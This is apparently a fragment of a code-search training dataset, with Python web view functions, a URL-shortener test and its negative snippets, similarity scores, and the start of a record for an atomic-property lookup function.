"def get_view(post_id):\n # create DB connection\n db_connection = sqlite3.connect(DB_FILE)\n db_cursor = db_connection.cursor()\n post_info = get_post_info(db_cursor, post_id)\n # close DB connection\n db_connection.close()\n page_title = \"Blog Manager | Edit Post\"\n styles = [ '/static/stylesheets/blog/edit_post_style.css' ]\n scripts = [ '/static/scripts/jquery.js', '/static/blog/scripts/edit_post_scripts.js' ]\n return render_template(\"blog/edit_post.html\", page_title=page_title, styles=styles, scripts=scripts, post_info=post_info)",
"def show_edit_post(post_id):\r\n post = Post.query.get_or_404(post_id)\r\n tags = Tag.query.all()\r\n return render_template('edit-post.html', post=post, tags=tags)",
"def edit(slug):\n entry = get_object_or_404(Entry, Entry.slug == slug)\n if request.method == 'POST':\n if request.form.get('title'):\n entry.title = request.form.get('title')\n if request.form.get('content'):\n entry.content = request.form.get('content')\n entry.published = request.form.get('published') or False\n entry.save()\n\n flash('Entry saved successfully!', 'success')\n if entry.published:\n return redirect(url_for('detail', slug=entry.slug))\n else:\n return redirect(url_for('edit', slug=entry.slug))\n return render_template('edit.html', entry=entry)",
"def new_post(request):\n if request.method != 'POST':\n # No data submitted; create a blank form.\n form = PostForm()\n else:\n # POST data submitted; process data.\n form = PostForm(data=request.POST)\n if form.is_valid():\n new_post = form.save(commit=False)\n new_post.owner = request.user\n new_post.save()\n return redirect('blogs:posts')\n\n # Display a blank or invalid form.\n context = {'form': form}\n return render(request, 'blogs/new_post.html', context)",
"def edit(self, *args, **kw):\n\t\t\ttmpl_context.widget = self.edit_form\n\t\t\tpks \t\t= self.provider.get_primary_fields(self.model)\n\t\t\tkw \t\t\t= {}\n\n\t\t\tfor i, pk in enumerate(pks):\n\t\t\t\tkw[pk] \t\t= args[i]\n\n\t\t\tvalue \t\t= self.edit_filler.get_value(kw)\n\t\t\tvalue['_method'] \t= 'PUT'\n\n\t\t\treturn dict(value = value, model = self.model.__name__, pk_count = len(pks))",
"def update(id):\n if request.method == \"POST\":\n result = update_post(\n id,\n request.form[\"title\"],\n request.form[\"body\"]\n )\n flash(result)\n return redirect(url_for(\"show\"))\n else:\n post = get_post(id)\n return render_template(\"edit.html\", **post)",
"def community_post_create_view(request):\n task = \"Create New\"\n form = AddEditPostForm() # An unbound form\n\n if request.method == 'POST': # If the form has been submitted...\n form = AddEditPostForm(request.POST, request.FILES) # A form bound to the POST data\n if form.is_valid(): # All validation rules pass\n post = form.save(commit=False) # Create a new object from the form, but don't save it to the database\n post.author = request.user # Set the author to the current user\n post.save() # Save the object to the database\n slug_str = \"%s %s\" % (post.title, post.date_posted) # Create a slug from the title and date\n post.slug = slugify(slug_str) # Create the slug\n post.save() # Save the object to the database\n return redirect('community-home') # Redirect to the home page\n\n context = { # Pass the variables to the template\n 'task': task,\n 'form': form,\n }\n return render(request,\n 'pages/patient-community/community-create-update-post.html',\n context) # render the patient community create post page",
"def edit(request,entry_id):\n assert isinstance(request, HttpRequest)\n try:\n entry = Entry.objects.get(pk=entry_id)\n except Entry.DoesNotExist:\n raise Http404(\"指定されたブログが存在しません。\")\n if not request.user or request.user.pk != entry.member.pk: # ブログ作成者以外は編集できない\n return HttpResponseForbidden() #アドレスをコピペしなければ通常は起こらないため例外処理で済ませておく。\n\n if request.method == 'POST': # フォームが提出された\n form = EntryForm(request.POST, instance = entry) # POST データの束縛フォーム\n if form.is_valid(): # バリデーションを通った\n form.save()\n return HttpResponseRedirect(reverse('entry_list')) # POST 後のリダイレクト\n else:\n form = EntryForm(instance = entry) # 非束縛フォーム\n article_list = Article.objects.order_by('-released_at')[:5]\n return render(request, 'app/entry_edit.html', { \n 'form': form,\n 'title':'ブログ記事の編集',\n 'year':datetime.now().year,\n 'articles':article_list,\n 'blogs':EntryView.get_entry_list('-posted_at',-1, request.user.pk )[:5],\n 'submit_title':'更新',\n 'entry_pk':entry.pk,\n 'current_user':request.user,\n })",
"def edit_textpost(request, textpost_id):\n\n textpost = TextPost.objects.get(id=textpost_id)\n textpost_age = get_submission_age(textpost)\n\n # Redirect unauthenticated users to register/ login.\n if not request.user.is_authenticated():\n return redirect('login')\n\n if request.method == 'POST':\n\n edit_textpost_form = TextPostForm(data=request.POST, instance=textpost)\n\n if edit_textpost_form.is_valid():\n # Make sure user can still edit,\n # and window has not passed since form displayed.\n if not can_edit_textpost(textpost, request):\n return redirect('/discuss/%s/' % textpost.id)\n\n edited_textpost = edit_textpost_form.save(commit=False)\n textpost.post_body = edited_textpost.post_body\n textpost.title = edited_textpost.title\n textpost.save()\n\n # Invalidate caches: This affects the discussion page for the textpost.\n # If title changed, also affects /index and /new caches.\n invalidate_caches('ed_news', 'index', 'new')\n invalidate_cache('discuss', (textpost.id, ), namespace='ed_news')\n\n # Redirect to discussion page.\n return redirect('/discuss/%s/' % textpost.id)\n\n else:\n # Invalid form/s.\n # Print errors to console; should log these?\n print 'ae', edit_textpost_form.errors\n\n else:\n # Send blank forms.\n edit_textpost_form = TextPostForm(instance=textpost)\n\n return render_to_response('ed_news/edit_textpost.html',\n {'edit_textpost_form': edit_textpost_form,\n 'textpost_id': textpost.id,\n },\n context_instance = RequestContext(request))",
"def edit_product(request, pk):\n\n products = get_object_or_404(Product, pk=pk)\n if request.method == 'POST':\n form = ProductPostForm(request.POST, instance=products)\n if form.is_valid():\n product = form.save()\n return redirect(product_details, product.pk)\n else:\n form = ProductPostForm(instance=products)\n return render(request, 'editproduct.html', {'form': form})",
"def show_edit_pet(id):\r\n pet = Pet.query.get_or_404(id)\r\n form = EditPetForm(obj=pet)\r\n\r\n if form.validate_on_submit():\r\n pet.photo_url = form.photo_url.data\r\n pet.notes = form.notes.data\r\n pet.available = form.available.data\r\n db.session.commit()\r\n\r\n return redirect('/')\r\n\r\n else:\r\n return render_template(\"pet_profile.html\", form=form, pet=pet)"
] |
[
"0.7231483",
"0.7201218",
"0.7087486",
"0.7010236",
"0.68301785",
"0.6799687",
"0.6771347",
"0.6679671",
"0.6574036",
"0.6568781",
"0.6561252",
"0.65269125",
"0.6515878",
"0.6515492",
"0.65128314",
"0.6512196",
"0.6499526",
"0.6496251",
"0.6495946",
"0.6487876",
"0.6430513",
"0.6422505",
"0.639111",
"0.6357845",
"0.6357224",
"0.6352436",
"0.6343541",
"0.63301826",
"0.6298263",
"0.6294746"
] |
0.7842363
|
0
|
Tests adding a Short URL with a custom key.
|
def test_add_with_key(self):
self.client.login(username='admin', password='admin')
response = self.client.post('/add/', {'url': 'http://example.com', 'key': 'example'}, follow=True)
self.assertShortURLCreated(response, 'example')
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_already_shortened_success(self):\n # Shorten a URL\n self.client.post(\n reverse('url_shortener'),\n data=json.dumps({'url': 'https://www.techcrunch.com/a-slug-here-starting-from-a'}),\n content_type='application/json'\n )\n\n # Try to shorten the same URL again.\n response = self.client.post(\n reverse('url_shortener'),\n data=json.dumps({'url': 'https://www.techcrunch.com/a-slug-here-starting-from-a'}),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, 200)\n content = json.loads(response.content)\n self.assertEqual(content.get('shortened_url'), '{}/{}'.format(SITE_URL, 'a_test'))",
"def test_short_url(self):\n tweet_object = self.load_tweet('basic')\n tweet_text = self.api.html_for_tweet(tweet_object, False)\n # Make sure HTML doesn't contain the display OR expanded url\n self.assertTrue('http://google.com' not in tweet_text)\n self.assertTrue('google.com' not in tweet_text)",
"def test_already_created_shortlink(self):\n rv = self.post('https://www.seinfeld.com')\n assert '<a href=\"TheStakeOut\">TheStakeOut</a> is now short for <a href=\"https://www.seinfeld.com\">https://www.seinfeld.com</a>!' in rv.data\n rv = self.post('https://www.seinfeld.com')\n assert '<a href=\"TheStakeOut\">TheStakeOut</a> is now short for <a href=\"https://www.seinfeld.com\">https://www.seinfeld.com</a>!' in rv.data",
"def short_url(self, short_url):\n\n self._short_url = short_url",
"def test_create_shortlink(self):\n rv = self.post('https://www.seinfeld.com')\n assert '<a href=\"TheStakeOut\">TheStakeOut</a> is now short for <a href=\"https://www.seinfeld.com\">https://www.seinfeld.com</a>!' in rv.data",
"def test_update_short_url(self):\n old_target = 'http://old.com'\n new_target = 'http://new.com'\n\n old_short_url = ShortUrl.objects.create(target=old_target)\n\n client = RequestsClient()\n response = client.patch('http://testserver/api/v1/urls/%s' % old_short_url.hash, json={'target': new_target})\n assert response.status_code == 200\n\n short_url = dict(response.json())\n self.assertEqual(short_url.get('target'), new_target)",
"def validate_short_url(self, value: str) -> str:\n url_id = self.context.get(\"url_id\") # just in update mode we have id.\n\n if url_id: # for update step old and new short_value could be same.\n try:\n old_short_url = URL.objects.get(id=url_id).short_url\n except URL.DoesNotExist:\n raise serializers.ValidationError(\"url does not exists!\")\n if old_short_url == value:\n return value\n\n if value and url_validator(value):\n raise serializers.ValidationError(\n \"custom short_url could not be URL itself.Please try for sequence of string instead of a valid URL!\"\n )\n return value",
"def test_create_short_url_without_device(self):\n client = RequestsClient()\n response = client.post('http://testserver/api/v1/urls', json={'target': 'http://example.com'})\n assert response.status_code == 201\n\n short_url = dict(response.json())\n self.assertIsNone(short_url.get('mobile_url'))\n self.assertIsInstance(short_url.get('target'), str)",
"def validate_short_url(form, field):\n if not field.data.isalnum():\n raise ValidationError('Custom alias must be alphanumeric.')",
"def test_create_short_url_with_device(self):\n target = 'http://exmaple.com'\n mobile_target = 'http://mobile.exmaple.com'\n tablet_target = 'http://tablet.exmaple.com'\n desktop_target = 'http://desktop.exmaple.com'\n data = {\n 'target': target,\n 'mobile_url': {'target': mobile_target},\n 'tablet_url': {'target': tablet_target},\n 'desktop_url': {'target': desktop_target},\n }\n\n client = RequestsClient()\n response = client.post('http://testserver/api/v1/urls', json=data)\n\n assert response.status_code == 201\n\n short_url = dict(response.json())\n self.assertIsNotNone(short_url.get('mobile_url'))\n self.assertIsNotNone(short_url.get('tablet_url'))\n self.assertIsNotNone(short_url.get('desktop_url'))\n\n mobile_url = short_url.get('mobile_url')\n tablet_url = short_url.get('tablet_url')\n desktop_url = short_url.get('desktop_url')\n\n self.assertEqual(mobile_url.get('target'), mobile_target)\n self.assertEqual(tablet_url.get('target'), tablet_target)\n self.assertEqual(desktop_url.get('target'), desktop_target)",
"def test_success(self):\n response = self.client.post(\n reverse('url_shortener'),\n data=json.dumps({'url': 'https://www.techcrunch.com/some-slug-here-starting-from-s'}),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, 201)\n\n response = self.client.post(\n reverse('url_shortener'),\n data=json.dumps({\n 'url': 'https://www.techcrunch.com/some-other-slug-here-starting-again-from-s'\n }),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, 201)\n\n response = self.client.post(\n reverse('url_shortener'),\n data=json.dumps({'url': 'https://www.techcrunch.com/some-third-long-slug'}),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, 201)\n\n content = json.loads(response.content)\n self.assertEqual(content.get('shortened_url'), '{}/{}'.format(SITE_URL, 'oaf'))",
"def test_shorturl_not_saving_without_longurl(self):\n db.session.add(self.short_url)\n with self.assertRaises(sqlalchemy.exc.IntegrityError):\n db.session.commit()",
"def url_shortner(self):",
"def test_short():\n key = 'A' * 241\n full_key = 'prefix:1:%s' % key\n assert full_key == make_key(key, 'prefix', 1)",
"def test_add(self):\n self.client.login(username='admin', password='admin')\n response = self.client.post('/add/', {'url': 'http://example.com'}, follow=True)\n self.assertShortURLCreated(response)",
"def test_add_url(self):\n url = 'http://test.com/'\n info = self.api.add_url(url, tags=['asd'])\n self.assertEqual(info['value'], url)\n tags = [t['name'] for t in info['tags']]\n self.assertEqual(tags, ['asd'])",
"def register_custom_short_path(short_path, content):",
"def short(self, url):\r\n\r\n self.clean_url(url)\r\n json = {\"originalURL\": url, \"domain\": self.domain}\r\n headers = {\"authorization\": self.api_key}\r\n response = self._post(self.api_url, json=json, headers=headers)\r\n if response.ok:\r\n data = response.json()\r\n if \"shortURL\" not in data:\r\n raise ShorteningErrorException(\r\n f\"API Returned wrong response: \" f\"{data}\"\r\n )\r\n return data[\"shortURL\"]\r\n raise ShorteningErrorException(response.content)",
"def test_generateRandom(self):\n\n # commented as of now as its failing randomly. Race due to\n # monkey patching ???\n # self.assertEqual(len(self.urlShortener.generateShortUrl()), 6)\n # self.assertEqual(len(self.urlShortener.generateShortUrl(7)), 7)\n\n self.assertEqual(self.urlShortener.generateShortUrl().isalnum(), True)",
"def test_shorturl_is_active_defaults(self):\n self.long_url.short_urls.append(self.short_url)\n self.user.short_urls.append(self.short_url)\n self.long_url.users.append(self.user)\n db.session.add(self.short_url)\n db.session.commit()\n self.assertTrue(self.short_url.is_active)",
"def test_forward(self):\n short_url = ShortURL.objects.create(url='http://example.com')\n response = self.client.get('/%s'%(short_url.key))\n self.assertEqual(response.status_code, 301)",
"def test_twitter_shortlink(self):\n\n test = Unfurl(remote_lookups=True)\n test.add_to_queue(data_type='url', key=None, value='https://t.co/g6VWYYwY12')\n test.parse_queue()\n\n # test number of nodes\n self.assertEqual(len(test.nodes.keys()), 18)\n self.assertEqual(test.total_nodes, 18)\n\n self.assertEqual(test.nodes[4].value, '/g6VWYYwY12')\n self.assertEqual(test.nodes[11].value, 'github.com')\n self.assertEqual(test.nodes[16].label, '1: obsidianforensics')\n\n # is processing finished empty\n self.assertTrue(test.queue.empty())\n self.assertEqual(len(test.edges), 0)",
"def short_post():\n short = str (request.form.get('short'))\n url = str (request.form.get('url'))\n url = http_check(url)\n \n if (short == \"\"): #Uses random hash url if URL is left blank. \n short = hash_gen(5)\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * from shorts where short='\" + short + \"'\")\n data = cursor.fetchone()\n\n if data is not None: #Throws 404 if the user tries to set a short URL already in use\n return flask.render_template('error.html', error=\"Short URL is already in use.\"), 404\n cursor.execute(\"INSERT into shorts (url, short, numclicked, lastaccess) VALUES ('\" + url + \"','\" + short + \"',0,CURDATE())\")\n conn.commit()\n #db[short] = url\n return flask.render_template(\"shorten.html\", short=short, url=url)",
"def test_missing_shortlink(self):\n rv = self.app.get('/TheStakeOut')\n assert 'No url found' in rv.data",
"def set_short_url_base(url):",
"def shortenedURL_detail(request, short_url):\n try:\n shortenedURL = ShortenedURL.objects.get(short_url=short_url)\n if request.method == 'GET':\n serializer = ShortenedURLSerializer(shortenedURL)\n return JsonResponse(serializer.data)\n\n if request.method == 'PUT':\n data = JSONParser().parse(request)\n serializer = ShortenedURLSerializer(shortenedURL, data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data)\n return JsonResponse(serializer.errors, status=400)\n\n if request.method == 'DELETE':\n shortenedURL.delete()\n return HttpResponse(status=204)\n except ShortenedURL.DoesNotExist:\n return HttpResponse(status=404)",
"def test_shorturl_time_saving(self):\n self.long_url.short_urls.append(self.short_url)\n self.user.short_urls.append(self.short_url)\n self.long_url.users.append(self.user)\n db.session.add(self.short_url)\n db.session.commit()\n self.assertIsInstance(self.short_url.date_created, datetime)",
"def test_update_short_url_with_device(self):\n old_target = 'http://old.com'\n old_mobile_target = 'http://mobile.old.com'\n old_tablet_target = 'http://tablet.old.com'\n old_desktop_target = 'http://desktop.old.com'\n\n new_target = 'http://new.com'\n new_mobile_target = 'http://mobile.new.com'\n new_tablet_target = 'http://tablet.new.com'\n new_desktop_target = 'http://desktop.new.com'\n\n new_data = {\n 'target': new_target,\n \"mobile_url\": {\"target\": new_mobile_target},\n \"tablet_url\": {\"target\": new_tablet_target},\n \"desktop_url\": {\"target\": new_desktop_target}\n }\n\n\n old_short_url = ShortUrl.objects.create(target=old_target)\n old_short_url.mobile_url = old_mobile_target\n old_short_url.tablet_url = old_tablet_target\n old_short_url.desktop_url = old_desktop_target\n old_short_url.save()\n\n client = RequestsClient()\n response = client.patch('http://testserver/api/v1/urls/%s' % old_short_url.hash, json=new_data)\n assert response.status_code == 200\n\n short_url = dict(response.json())\n self.assertEqual(short_url.get('target'), new_target)\n self.assertEqual(short_url.get('mobile_url').get('target'), new_mobile_target)\n self.assertEqual(short_url.get('tablet_url').get('target'), new_tablet_target)\n self.assertEqual(short_url.get('desktop_url').get('target'), new_desktop_target)",
"def gen_shorter_url(long_url):\n if long_url in URL_PAIR_STORE.long_url:\n return URL_PAIR_STORE.short_url[\n URL_PAIR_STORE.long_url == long_url]\n else:\n short_url = DOMAIN_NAME + '/' + do_hashing(long_url)\n new_entry = URLPair(\n id=gen_unique_id(),\n long_url=long_url,\n short_url=short_url,\n )\n insert_new_pairs(new_entry)\n return short_url",
"def create_short_url():\n if request.method == 'POST':\n if 'url' in request.args:\n og_url = request.args['url']\n\n if url_check(og_url) is True:\n if 'custom' in request.args:\n token_string = request.args['custom']\n if 'tag' in request.args:\n tag_url = request.args['tag']\n else:\n tag_url = ''\n else:\n token_string = random_token()\n\n if 'tag' in request.args:\n tag_url = request.args['tag']\n else:\n tag_url = ''\n\n conn = psycopg2.connect(host=host, user=user, password=passwrd, database=db)\n cursor = conn.cursor()\n check_row = \"SELECT S_URL FROM WEB_URL WHERE S_URL = %s FOR UPDATE\"\n cursor.execute(check_row, (token_string,))\n check_fetch = cursor.fetchone()\n\n if check_fetch is None:\n insert_row = \"\"\"\n\t\t\t\t\t\tINSERT INTO WEB_URL(URL , S_URL , TAG) VALUES( %s, %s , %s)\n\t\t\t\t\t\t\"\"\"\n\n cursor.execute(insert_row, (og_url, token_string, tag_url,))\n\n conn.commit()\n conn.close()\n\n short_url = shorty_host + token_string\n long_url = og_url\n data = jsonify({\n 'long_url': og_url,\n 'short_url': short_url,\n 'custom': token_string,\n 'tag': tag_url\n })\n\n return make_response(data, 200)\n else:\n data = jsonify({'error': 'suffix already present'})\n return make_response(data, 200)\n else:\n data = jsonify({'error': 'URL given is not valid . Enter a valid URL.'})\n return make_response(data, 200)\n else:\n data = jsonify({'error': 'invalid request'})\n return make_response(data, 405)\n else:\n data = jsonify({'error': 'Invalid Method Used'})\n return make_response(data, 405)"
] |
[
"0.66355175",
"0.66069746",
"0.65604275",
"0.6440158",
"0.64186394",
"0.6341924",
"0.62792903",
"0.62442976",
"0.6228952",
"0.61976457",
"0.6176387",
"0.6163858",
"0.6097762",
"0.6049345",
"0.6034544",
"0.5974167",
"0.5925666",
"0.5920434",
"0.59131527",
"0.58411014",
"0.580802",
"0.5804937",
"0.5792929",
"0.57784384",
"0.5775389",
"0.5757774",
"0.57486904",
"0.57214457",
"0.57104546",
"0.5677904"
] |
0.75209296
|
0
|
Tests forwarding of a Short URL
|
def test_forward(self):
short_url = ShortURL.objects.create(url='http://example.com')
response = self.client.get('/%s'%(short_url.key))
self.assertEqual(response.status_code, 301)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def url_shortner(self):",
"def test_short_url(self):\n tweet_object = self.load_tweet('basic')\n tweet_text = self.api.html_for_tweet(tweet_object, False)\n # Make sure HTML doesn't contain the display OR expanded url\n self.assertTrue('http://google.com' not in tweet_text)\n self.assertTrue('google.com' not in tweet_text)",
"def test_missing_shortlink(self):\n rv = self.app.get('/TheStakeOut')\n assert 'No url found' in rv.data",
"def test_redirects_shortlink_without_http_scheme(self):\n rv = self.post('www.seinfeld.com')\n assert '<a href=\"TheStakeOut\">TheStakeOut</a> is now short for <a href=\"www.seinfeld.com\">www.seinfeld.com</a>!' in rv.data\n rv = self.app.get('/TheStakeOut')\n assert rv.status_code == 302\n assert rv.location == 'http://www.seinfeld.com'",
"def test_redirects_shortlink(self):\n rv = self.post('https://www.seinfeld.com')\n assert '<a href=\"TheStakeOut\">TheStakeOut</a> is now short for <a href=\"https://www.seinfeld.com\">https://www.seinfeld.com</a>!' in rv.data\n rv = self.app.get('/TheStakeOut')\n assert rv.status_code == 302\n assert rv.location == 'https://www.seinfeld.com'",
"def testLongURL(self):\n self.assertEqual([], grab('www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www', self.needScheme))",
"def test_create_short_url_without_device(self):\n client = RequestsClient()\n response = client.post('http://testserver/api/v1/urls', json={'target': 'http://example.com'})\n assert response.status_code == 201\n\n short_url = dict(response.json())\n self.assertIsNone(short_url.get('mobile_url'))\n self.assertIsInstance(short_url.get('target'), str)",
"def test_already_created_shortlink(self):\n rv = self.post('https://www.seinfeld.com')\n assert '<a href=\"TheStakeOut\">TheStakeOut</a> is now short for <a href=\"https://www.seinfeld.com\">https://www.seinfeld.com</a>!' in rv.data\n rv = self.post('https://www.seinfeld.com')\n assert '<a href=\"TheStakeOut\">TheStakeOut</a> is now short for <a href=\"https://www.seinfeld.com\">https://www.seinfeld.com</a>!' in rv.data",
"def test_already_shortened_success(self):\n # Shorten a URL\n self.client.post(\n reverse('url_shortener'),\n data=json.dumps({'url': 'https://www.techcrunch.com/a-slug-here-starting-from-a'}),\n content_type='application/json'\n )\n\n # Try to shorten the same URL again.\n response = self.client.post(\n reverse('url_shortener'),\n data=json.dumps({'url': 'https://www.techcrunch.com/a-slug-here-starting-from-a'}),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, 200)\n content = json.loads(response.content)\n self.assertEqual(content.get('shortened_url'), '{}/{}'.format(SITE_URL, 'a_test'))",
"def go_to_short_url(short_url):\n try:\n original_url = storage.get(short_url)\n return redirect(original_url)\n except:\n abort(400)",
"def test_create_shortlink(self):\n rv = self.post('https://www.seinfeld.com')\n assert '<a href=\"TheStakeOut\">TheStakeOut</a> is now short for <a href=\"https://www.seinfeld.com\">https://www.seinfeld.com</a>!' in rv.data",
"def test_success(self):\n response = self.client.post(\n reverse('url_shortener'),\n data=json.dumps({'url': 'https://www.techcrunch.com/some-slug-here-starting-from-s'}),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, 201)\n\n response = self.client.post(\n reverse('url_shortener'),\n data=json.dumps({\n 'url': 'https://www.techcrunch.com/some-other-slug-here-starting-again-from-s'\n }),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, 201)\n\n response = self.client.post(\n reverse('url_shortener'),\n data=json.dumps({'url': 'https://www.techcrunch.com/some-third-long-slug'}),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, 201)\n\n content = json.loads(response.content)\n self.assertEqual(content.get('shortened_url'), '{}/{}'.format(SITE_URL, 'oaf'))",
"def test_create_short_url_with_device(self):\n target = 'http://exmaple.com'\n mobile_target = 'http://mobile.exmaple.com'\n tablet_target = 'http://tablet.exmaple.com'\n desktop_target = 'http://desktop.exmaple.com'\n data = {\n 'target': target,\n 'mobile_url': {'target': mobile_target},\n 'tablet_url': {'target': tablet_target},\n 'desktop_url': {'target': desktop_target},\n }\n\n client = RequestsClient()\n response = client.post('http://testserver/api/v1/urls', json=data)\n\n assert response.status_code == 201\n\n short_url = dict(response.json())\n self.assertIsNotNone(short_url.get('mobile_url'))\n self.assertIsNotNone(short_url.get('tablet_url'))\n self.assertIsNotNone(short_url.get('desktop_url'))\n\n mobile_url = short_url.get('mobile_url')\n tablet_url = short_url.get('tablet_url')\n desktop_url = short_url.get('desktop_url')\n\n self.assertEqual(mobile_url.get('target'), mobile_target)\n self.assertEqual(tablet_url.get('target'), tablet_target)\n self.assertEqual(desktop_url.get('target'), desktop_target)",
"def test_twitter_shortlink(self):\n\n test = Unfurl(remote_lookups=True)\n test.add_to_queue(data_type='url', key=None, value='https://t.co/g6VWYYwY12')\n test.parse_queue()\n\n # test number of nodes\n self.assertEqual(len(test.nodes.keys()), 18)\n self.assertEqual(test.total_nodes, 18)\n\n self.assertEqual(test.nodes[4].value, '/g6VWYYwY12')\n self.assertEqual(test.nodes[11].value, 'github.com')\n self.assertEqual(test.nodes[16].label, '1: obsidianforensics')\n\n # is processing finished empty\n self.assertTrue(test.queue.empty())\n self.assertEqual(len(test.edges), 0)",
"def redirect(url):",
"def test_url():\r\n global provided_url\r\n global verbose_flag\r\n # extracting url\r\n provided_url = urlparse(provided_url).scheme+\"://\"+urlparse(provided_url).netloc\r\n print provided_url \r\n if verbose_flag: print \"\\t[.] Checking if connection can be established...\",# + provided_url\r\n try:\r\n response = urllib2.urlopen(provided_url)\r\n \r\n except HTTPError, e:\r\n if verbose_flag: print \"[!] Failed\"\r\n return 0\r\n except URLError, e:\r\n if verbose_flag: print \"[!] Failed\"\r\n return 0\r\n else:\r\n valid_target = 1\r\n if verbose_flag: print \"Success\"\r\n return 1",
"def link_redirect(request, shortened_url: str):\n try:\n url = Url.objects.get(short_url=shortened_url)\n long_url = url.long_url\n return HttpResponseRedirect(long_url)\n except Url.DoesNotExist or TypeError:\n return HttpResponseBadRequest(\"Wrong url\")",
"def test_can_be_redirected(self):\n\n url = 'http://www.example.com'\n\n r = LiveRedirect(url=url,duration=HALF_DAY)\n r.save()\n\n TEST_URLS = [\n '%s/%s' % (self.live_server_url,r.slug),\n '%s/%s/' % (self.live_server_url,r.slug),\n ]\n\n for url in TEST_URLS:\n\n self.browser.get(url)\n\n body = self.browser.find_element_by_tag_name('body')\n\n # Check that it is not a 404 or 500\n self.assertNotIn('404',body.text)\n self.assertNotIn('500',body.text)\n\n # Slug page should always state what the url is\n self.assertIn(r.url, body.text, 'Link url not displayed on slug page!')\n\n # Slug page should always have a link to the correct page!\n links = self.browser.find_elements_by_tag_name('a')\n\n ok = False\n for link in links:\n if link.get_attribute('href').rstrip('/') == r.url.rstrip('/'):\n ok = True\n break\n\n self.failIf(not ok,'No link to target!')",
"def test_forward(self):\n validate_forward()",
"def test_good_get_url(self):\n result = self._search('Love Story', just_results=True)\n get_url = result[0]['get_url']\n resp = self.app.get(get_url)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('url', resp.data)\n self.assertIn('/d?', resp.data)",
"def test_follow(self):\n url = 'http://www.python.org/'\n link = Link.objects.create(slug='testslug', url=url)\n self.assertEqual(link.usage_count, 0)\n\n # try to open without logging in\n response = self.client.get(reverse('shortener:follow', kwargs={\n 'slug': link.slug}))\n self.assertRedirects(response, LOGIN_URL, 400)\n\n # follow the short url and get a redirect\n User.objects.create_user('testuser', email='[email protected]')\n self.client.login(username='testuser')\n response = self.client.get(reverse('shortener:follow', kwargs={\n 'slug': link.slug}))\n self.assertRedirects(response, url, 301, fetch_redirect_response=False)\n\n # re-fetch link so that we can make sure that usage_count incremented\n link = Link.objects.get(id=link.id)\n self.assertEqual(link.usage_count, 1)",
"def test_redirect_view(self):\n # TODO: Get test to work.\n client = Client()\n #response = client.get(reverse(testurl))\n #self.assertEqual(301, response.status_code)",
"def test_linkedin_shortlink(self):\n \n test = Unfurl(remote_lookups=True)\n test.add_to_queue(data_type='url', key=None, value='https://lnkd.in/fDJnJ64')\n test.parse_queue()\n\n # test number of nodes\n self.assertEqual(len(test.nodes.keys()), 18)\n self.assertEqual(test.total_nodes, 18)\n\n self.assertEqual(test.nodes[4].value, '/fDJnJ64')\n self.assertEqual(test.nodes[11].value, 'thisweekin4n6.com')\n self.assertEqual(test.nodes[18].key, 4)\n\n # is processing finished empty\n self.assertTrue(test.queue.empty())\n self.assertEqual(len(test.edges), 0)",
"def test_specific_url_query_sent_with_request(self):\n req = self.httpbin_2.get_my_headers(dry_run=True)\n def_url_query = self.httpbin_2.client[\"get_my_headers\"][\"url_query\"]\n self.assertIn(urlencode(def_url_query), req.prepared_request.url)",
"def short(self, url):\r\n\r\n self.clean_url(url)\r\n json = {\"originalURL\": url, \"domain\": self.domain}\r\n headers = {\"authorization\": self.api_key}\r\n response = self._post(self.api_url, json=json, headers=headers)\r\n if response.ok:\r\n data = response.json()\r\n if \"shortURL\" not in data:\r\n raise ShorteningErrorException(\r\n f\"API Returned wrong response: \" f\"{data}\"\r\n )\r\n return data[\"shortURL\"]\r\n raise ShorteningErrorException(response.content)",
"def test_redirect_status(self):\n # TODO: Get test to work.\n client = Client()\n #response = client.get(testurl)\n #self.assertEqual(301, response.status_code)",
"def redirect_to_url(request, short_url):\n try:\n url = Url.objects.get(short_url=short_url)\n except Url.DoesNotExist:\n raise Http404()\n else:\n return HttpResponseRedirect(url.url)",
"def test_update_short_url(self):\n old_target = 'http://old.com'\n new_target = 'http://new.com'\n\n old_short_url = ShortUrl.objects.create(target=old_target)\n\n client = RequestsClient()\n response = client.patch('http://testserver/api/v1/urls/%s' % old_short_url.hash, json={'target': new_target})\n assert response.status_code == 200\n\n short_url = dict(response.json())\n self.assertEqual(short_url.get('target'), new_target)",
"def redirect_view(request, short_url):\n try:\n if request.method == 'GET':\n shortener = ShortenedURL.objects.get(short_url=short_url)\n shortener.times_visited += 1\n shortener.save()\n return HttpResponseRedirect(shortener.long_url)\n except ShortenedURL.DoesNotExist:\n return HttpResponse(status=404)",
"def short_url(self, short_url):\n\n self._short_url = short_url"
] |
[
"0.70597917",
"0.700918",
"0.69712824",
"0.69603354",
"0.6934416",
"0.6462165",
"0.64400935",
"0.6436771",
"0.6412842",
"0.63884264",
"0.637923",
"0.63788974",
"0.632071",
"0.63126487",
"0.62797225",
"0.6258323",
"0.62535286",
"0.6141924",
"0.613619",
"0.61337805",
"0.610609",
"0.6069687",
"0.6018508",
"0.5966642",
"0.5961444",
"0.59570974",
"0.5938434",
"0.5930512",
"0.5918581",
"0.58945316"
] |
0.7791865
|
0
|
Get the absolute property value with propertyname for the given atom.
|
def GetAbsoluteAtomicProperty(element='C', propertyname='m'):
    # periodicTable (an RDKit PeriodicTable), pi (math.pi) and the AtomProperty
    # lookup table are module-level objects this snippet relies on.
    if propertyname == "m":
        return periodicTable.GetAtomicWeight(element)
    elif propertyname == "V":
        r = periodicTable.GetRvdw(element)
        V = 4.0 / 3.0 * pi * r ** 3  # van der Waals volume from the vdW radius
        return V
    elif propertyname == "Z":
